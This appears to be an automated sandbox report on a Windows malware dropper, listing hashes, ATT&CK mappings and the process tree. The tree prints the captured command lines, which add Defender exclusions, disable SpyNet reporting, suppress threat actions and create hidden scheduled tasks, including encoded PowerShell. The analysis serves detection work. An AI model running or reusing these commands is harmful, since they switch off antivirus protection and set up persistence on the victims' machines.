91f46858f0c0c41956f3a32bd9431d4870c971a0046341c637e5fb66ba2225d6

General

Target

file.exe
Size

7.3MB
MD5

39e04a79618a8124f50e36a9da48b0ae
SHA1

f4af312ff672e5dbb48fba0f0da43e834c056a23
SHA256

91f46858f0c0c41956f3a32bd9431d4870c971a0046341c637e5fb66ba2225d6
SHA512

c1b524fb9ea93249102e2a519e5fddb5a891edef37a3bc6a753ae4638fd195d021ef6aa44f9d99e7c7ea13bbbf32cc410a6a12298082a57199bcd69ebcfca2a1
SSDEEP

196608:91O15kTwkxlP3zqeWrQMOJXwqUUtzBvwLsKtSUi:3O15Gwkfqe17rUUtlvZKt5i

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exelxAnxCX.exe

pid process

1728 Install.exe
4800 Install.exe
3088 lxAnxCX.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

612 schtasks.exe
4260 schtasks.exe

pid	process
1728	Install.exe
4800	Install.exe
3088	lxAnxCX.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Install.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

description	ioc	process
File created	C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job	schtasks.exe

pid	process
612	schtasks.exe
4260	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.EXEpowershell.exe

pid process

4912 powershell.EXE
4912 powershell.EXE
4232 powershell.exe
4232 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.EXEpowershell.exe

description pid process

Token: SeDebugPrivilege 4912 powershell.EXE
Token: SeDebugPrivilege 4232 powershell.exe

pid	process
4912	powershell.EXE
4912	powershell.EXE
4232	powershell.exe
4232	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4912	powershell.EXE
Token: SeDebugPrivilege	4232	powershell.exe

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXElxAnxCX.exe

description	pid	process	target process
PID 1936 wrote to memory of 1728	1936	file.exe	Install.exe
PID 1936 wrote to memory of 1728	1936	file.exe	Install.exe
PID 1936 wrote to memory of 1728	1936	file.exe	Install.exe
PID 1728 wrote to memory of 4800	1728	Install.exe	Install.exe
PID 1728 wrote to memory of 4800	1728	Install.exe	Install.exe
PID 1728 wrote to memory of 4800	1728	Install.exe	Install.exe
PID 4800 wrote to memory of 4956	4800	Install.exe	forfiles.exe
PID 4800 wrote to memory of 4956	4800	Install.exe	forfiles.exe
PID 4800 wrote to memory of 4956	4800	Install.exe	forfiles.exe
PID 4800 wrote to memory of 3128	4800	Install.exe	forfiles.exe
PID 4800 wrote to memory of 3128	4800	Install.exe	forfiles.exe
PID 4800 wrote to memory of 3128	4800	Install.exe	forfiles.exe
PID 4956 wrote to memory of 2976	4956	forfiles.exe	cmd.exe
PID 3128 wrote to memory of 3296	3128	forfiles.exe	cmd.exe
PID 4956 wrote to memory of 2976	4956	forfiles.exe	cmd.exe
PID 4956 wrote to memory of 2976	4956	forfiles.exe	cmd.exe
PID 3128 wrote to memory of 3296	3128	forfiles.exe	cmd.exe
PID 3128 wrote to memory of 3296	3128	forfiles.exe	cmd.exe
PID 3296 wrote to memory of 3424	3296	cmd.exe	reg.exe
PID 3296 wrote to memory of 3424	3296	cmd.exe	reg.exe
PID 3296 wrote to memory of 3424	3296	cmd.exe	reg.exe
PID 2976 wrote to memory of 4496	2976	cmd.exe	reg.exe
PID 2976 wrote to memory of 4496	2976	cmd.exe	reg.exe
PID 2976 wrote to memory of 4496	2976	cmd.exe	reg.exe
PID 2976 wrote to memory of 1420	2976	cmd.exe	reg.exe
PID 2976 wrote to memory of 1420	2976	cmd.exe	reg.exe
PID 2976 wrote to memory of 1420	2976	cmd.exe	reg.exe
PID 3296 wrote to memory of 4888	3296	cmd.exe	reg.exe
PID 3296 wrote to memory of 4888	3296	cmd.exe	reg.exe
PID 3296 wrote to memory of 4888	3296	cmd.exe	reg.exe
PID 4800 wrote to memory of 4260	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4260	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4260	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4312	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4312	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4312	4800	Install.exe	schtasks.exe
PID 4912 wrote to memory of 588	4912	powershell.EXE	gpupdate.exe
PID 4912 wrote to memory of 588	4912	powershell.EXE	gpupdate.exe
PID 4800 wrote to memory of 4404	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4404	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 4404	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 612	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 612	4800	Install.exe	schtasks.exe
PID 4800 wrote to memory of 612	4800	Install.exe	schtasks.exe
PID 3088 wrote to memory of 4232	3088	lxAnxCX.exe	powershell.exe
PID 3088 wrote to memory of 4232	3088	lxAnxCX.exe	powershell.exe
PID 3088 wrote to memory of 4232	3088	lxAnxCX.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936

C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728

C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2976

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:4496

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1420

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:3128

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:3296

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:3424

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:4888

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gxBvHkGXQ" /SC once /ST 01:22:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:4260

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gxBvHkGXQ"
4⤵
PID:4312

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gxBvHkGXQ"
4⤵
PID:4404

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 05:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe\" d8 /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:308

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4188

C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe d8 /site_id 525403 /S
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS3C9.tmp\Install.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exe
Filesize
6.2MB

MD5
60e1b9be0cc604e0527ac0523e689150

SHA1
4a0ac355d6c7bb4f41631b7bef01879672b17330

SHA256
0529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f

SHA512
1cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBBA.tmp\Install.exe
Filesize
6.2MB

MD5
60e1b9be0cc604e0527ac0523e689150

SHA1
4a0ac355d6c7bb4f41631b7bef01879672b17330

SHA256
0529307a084043c429ac53b20f309868bcdd24a08b006af2df20cf45d115986f

SHA512
1cde30f820979d6d72ca23c6afb54aabc57a082e2146607053d88e0a01cf5fceb9f782abeb879170ccba06fbf90105828702332f962032ab454b23165df42e71

Download Submit
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\lxAnxCX.exe
Filesize
6.8MB

MD5
6f52a47480dae7c97a64dd5aebb8e426

SHA1
204fe492e1cdeacea89a4f3b2cf41626053bc992

SHA256
a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879

SHA512
994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c

Download Submit
memory/588-153-0x0000000000000000-mapping.dmp

Download
memory/612-156-0x0000000000000000-mapping.dmp

Download
memory/1420-147-0x0000000000000000-mapping.dmp

Download
memory/1728-132-0x0000000000000000-mapping.dmp

Download
memory/2976-143-0x0000000000000000-mapping.dmp

Download
memory/3088-159-0x0000000010000000-0x0000000010B5F000-memory.dmp

Filesize
11.4MB

Download
memory/3128-142-0x0000000000000000-mapping.dmp

Download
memory/3296-144-0x0000000000000000-mapping.dmp

Download
memory/3424-145-0x0000000000000000-mapping.dmp

Download
memory/4232-162-0x0000000000000000-mapping.dmp

Download
memory/4232-164-0x0000000003B40000-0x0000000004168000-memory.dmp

Filesize
6.2MB

Download
memory/4232-168-0x0000000004A50000-0x0000000004A6E000-memory.dmp

Filesize
120KB

Download
memory/4232-163-0x00000000034D0000-0x0000000003506000-memory.dmp

Filesize
216KB

Download
memory/4232-167-0x00000000042E0000-0x0000000004346000-memory.dmp

Filesize
408KB

Download
memory/4232-165-0x0000000003A50000-0x0000000003A72000-memory.dmp

Filesize
136KB

Download
memory/4232-166-0x0000000004270000-0x00000000042D6000-memory.dmp

Filesize
408KB

Download
memory/4260-149-0x0000000000000000-mapping.dmp

Download
memory/4312-150-0x0000000000000000-mapping.dmp

Download
memory/4404-155-0x0000000000000000-mapping.dmp

Download
memory/4496-146-0x0000000000000000-mapping.dmp

Download
memory/4800-135-0x0000000000000000-mapping.dmp

Download
memory/4800-138-0x0000000010000000-0x0000000010B5F000-memory.dmp

Filesize
11.4MB

Download
memory/4888-148-0x0000000000000000-mapping.dmp

Download
memory/4912-152-0x000001A3FBD40000-0x000001A3FBD62000-memory.dmp

Filesize
136KB

Download
memory/4912-154-0x00007FFD6C7C0000-0x00007FFD6D281000-memory.dmp

Filesize
10.8MB

Download
memory/4912-151-0x00007FFD6C7C0000-0x00007FFD6D281000-memory.dmp

Filesize
10.8MB

Download
memory/4956-141-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads